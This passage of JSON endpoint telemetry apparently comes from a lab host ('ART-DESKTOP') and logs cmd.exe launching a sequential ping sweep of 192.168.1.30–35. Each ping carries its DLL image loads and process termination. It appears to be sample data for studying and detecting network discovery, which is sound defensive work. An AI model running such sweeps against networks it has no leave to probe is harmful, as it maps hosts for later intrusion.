"process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6660, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, 
- { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127140000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572127300000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "event_type": "process", - "pid": 6660, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572131990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.30", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6172, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - 
"event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6172, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572132140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "event_type": "process", - "pid": 6172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572136830000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.31", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3476, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572136980000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3476, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572136990000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572137140000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "event_type": "process", - "pid": 3476, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572141840000, - "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.32", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6672, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572141990000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "event_type": "process", - "pid": 6672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572146830000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.33", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "process", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572151840000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.34", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572151980000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "process", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572156990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.35", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": 
